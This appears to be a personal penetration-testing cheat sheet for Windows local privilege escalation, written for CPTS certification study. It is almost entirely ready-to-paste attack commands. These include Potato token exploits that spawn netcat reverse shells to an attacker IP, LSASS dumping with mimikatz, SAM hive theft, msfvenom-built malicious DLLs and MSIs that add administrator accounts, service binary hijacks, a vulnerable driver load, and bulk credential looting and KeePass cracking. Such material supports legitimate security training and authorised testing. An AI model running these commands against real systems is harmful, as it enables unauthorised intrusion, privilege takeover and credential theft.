KagisoSec_
Privilege Escalation
PRIVILEGE ESCALATION

Windows Privilege Escalation

The full CPTS Windows local privesc playbook, grouped by the class of vector you found: Enumeration → User Privileges (token abuse) → Group Privileges → Attacking the OS → Credential Theft. Token privileges (SeImpersonate Potatoes, SeDebug, SeTakeOwnership, SeBackup), privileged groups (DnsAdmins, Hyper-V, Server/Print Operators, Event Log Readers), service/UAC/kernel misconfigs, and local credential looting (files, cmdkey, DPAPI, browsers, LaZagne). Every payload is its own copy block. The domain kill chain lives in AD Attacks.

privilege-escalation windows potato mimikatz uac lazagne cpts

The flow on a Windows host: enumerate, then match what you found to a vector class below — a token privilege (whoami /priv), a privileged group (whoami /groups), an OS/service misconfiguration, or stored credentials. Each section is named for the class of technique inside it, so the Contents panel doubles as a checklist. Once you recover domain creds or a hash, continue in the AD Attacks bank.

Enumeration & Situational Awareness

Automated tools

winPEAS:

winPEASx64.exe

SharpUp (service/ACL audit):

SharpUp.exe audit

PowerUp:

powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"

Seatbelt:

Seatbelt.exe -group=all

Host & network info

Interfaces / DNS:

ipconfig /all

ARP table:

arp -a

Routing table:

route print

Detailed config (build number for kernel exploits):

systeminfo

Installed patches:

wmic qfe get Caption,Description,HotFixID,InstalledOn

Installed programs:

wmic product get name,version

Network connections:

netstat -ano

Find the process listening on a port:

netstat -aon | findstr :8080

Defences in place

Defender status:

Get-MpComputerStatus

AppLocker policy:

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Test if a path is AppLocker-blocked:

Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone

Users, groups & privileges

Your privileges (the money check — drives the User Privileges section):

whoami /priv

Your groups (drives the Group Privileges section):

whoami /groups

Logged-in users:

query user

All local users:

net user

A group’s members:

net localgroup administrators

Password policy:

net accounts

Local services & named pipes

Running services:

tasklist /svc

List named pipes:

gci \\.\pipe\

Check a pipe’s DACL for writable access:

accesschk.exe -accepteula -w \pipe\WindscribeService -v

User Privileges (Token Abuse)

You hold a sensitive token privilege in whoami /priv — abuse it for a SYSTEM shell.

SeImpersonate / SeAssignPrimaryToken — Potatoes

PrintSpoofer:

PrintSpoofer.exe -i -c cmd

JuicyPotato (catch with a listener):

JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe <YOUR_IP> 8443 -e cmd.exe" -t *

GodPotato (modern, post-2019):

GodPotato-NET4.exe -cmd "cmd /c whoami"

If the privilege is held by a service account (e.g. MSSQL), connect:

mssqlclient.py sql_dev@<TARGET> -windows-auth

Enable command exec:

enable_xp_cmdshell

Run the Potato through it:

xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe <YOUR_IP> 8443 -e cmd"

SeDebugPrivilege — dump LSASS / impersonate SYSTEM

Dump LSASS:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Parse it offline in mimikatz:

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Or impersonate a SYSTEM parent process (psgetsys.ps1). Load it:

. .\psgetsys.ps1

Spawn SYSTEM from winlogon’s PID:

ImpersonateFromParentPid -ppid 608 -command "C:\Windows\System32\cmd.exe" -cmdargs ""

SeTakeOwnershipPrivilege — seize a target file

Enable all token privileges first:

Import-Module .\Enable-Privilege.ps1; . .\Enable-Privilege.ps1

Take ownership of a target file:

takeown /f 'C:\Department Shares\Private\IT\cred.txt'

Grant yourself full control:

icacls 'C:\Department Shares\Private\IT\cred.txt' /grant <user>:F

Read it:

cat 'C:\Department Shares\Private\IT\cred.txt'

SeBackupPrivilege / SeRestorePrivilege — steal the SAM

Save the SAM hive:

reg save hklm\sam C:\temp\sam.hive

Save the SYSTEM hive:

reg save hklm\system C:\temp\system.hive

Dump hashes from them:

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

Group Privileges

You’re a member of a privileged group in whoami /groups — each maps to a specific escalation.

Event Log Readers — read logged command lines

Search the Security log for command-line passwords:

wevtutil qe Security /rd:true /f:text | Select-String "/user"

Get-WinEvent for 4688 process-creation events:

Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

DnsAdmins — malicious DLL as the DNS service

Build a malicious DLL:

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

Load it as the DNS service plugin:

dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll

Restart DNS to trigger (as SYSTEM):

sc.exe stop dns && sc.exe start dns

Hyper-V Administrators — hijack the maintenance binary

Take ownership of the Mozilla maintenance binary:

takeown /F "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

Start the service (runs your replaced binary as SYSTEM):

sc.exe start MozillaMaintenance

Print Operators (SeLoadDriverPrivilege) — load a vulnerable driver

Load the vulnerable Capcom driver:

EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys

Server Operators — repoint a service binary

Inspect the service:

sc qc AppReadiness

Repoint the binary to add yourself to admins:

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

Start it:

sc start AppReadiness

Then dump the DC hashes:

impacket-secretsdump server_adm@<TARGET> -just-dc-user administrator

Attacking the OS

No special token or group — abuse a service, registry or kernel misconfiguration instead.

Permissive service-binary ACL

Check the binary’s ACL:

icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Replace the binary, then restart the service to run it:

sc start SecurityService

Weak service permissions

Check the service with accesschk:

accesschk.exe /accepteula -quvcw WindscribeService

Change the binary path:

sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"

Stop the service:

sc stop WindscribeService

Start it to trigger:

sc start WindscribeService

Unquoted service paths

Find them:

wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """

AlwaysInstallElevated

Both keys must be 1. HKLM:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKCU:

reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Build a malicious MSI:

msfvenom -p windows/x64/exec cmd='net localgroup administrators <user> /add' -f msi -o evil.msi

Run it elevated:

msiexec /quiet /qn /i evil.msi

UAC bypass

Is UAC enabled:

REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA

UAC level:

REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin

Windows build (match against UACME techniques):

[environment]::OSVersion.Version

Kernel exploits

Check installed patches:

wmic qfe list brief

Check SAM readability (a quick-win indicator):

icacls c:\Windows\System32\config\SAM

Credential Theft

Loot credentials stored on the host. Recovered passwords and hashes feed Password Attacks (lateral movement) and the AD Attacks kill chain.

Credential files & history

Files containing “password”:

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

Recursive file-extension hunt:

Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Unattend / sysprep files:

dir /s /b C:\unattend.xml C:\Windows\Panther\Unattend.xml

PowerShell history (current user):

gc (Get-PSReadLineOption).HistorySavePath

PowerShell history (all users):

foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Decrypt a saved PowerShell credential:

$credential = Import-Clixml -Path 'C:\scripts\pass.xml'; $credential.GetNetworkCredential().password

Saved & cached credentials

Saved credentials:

cmdkey /list

Run as a saved credential:

runas /savecred /user:inlanefreight\bob "COMMAND HERE"

AutoLogon cleartext password in the registry:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

PuTTY saved sessions (proxy creds in cleartext):

reg query HKCU\SOFTWARE\SimonTatham\PuTTY\Sessions

Browser, app & database creds

Chrome saved logins:

SharpChrome.exe logins /unprotect

Sticky Notes database:

type %LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

Sweep everything with LaZagne:

lazagne.exe all

Extract saved PuTTY/WinSCP/RDP creds with SessionGopher:

Import-Module .\SessionGopher.ps1; Invoke-SessionGopher -Target localhost

Search a domain’s mailboxes (MailSniper):

Invoke-GlobalMailSearch -ImpersonationAccount current-username -ExchHostname Exch01 -OutputCsv global-email-search.csv

KeePass database, extract the hash:

keepass2john Database.kdbx > keepass_hash

Crack it:

hashcat -m 13400 keepass_hash rockyou.txt

Order of effort: enumerate (whoami /priv + winPEAS) → cash in a token privilege (Potato) or group membership for SYSTEM → if neither, attack a weak service / UAC / kernel → then loot every credential store. Take the passwords and hashes into Password Attacks and AD Attacks.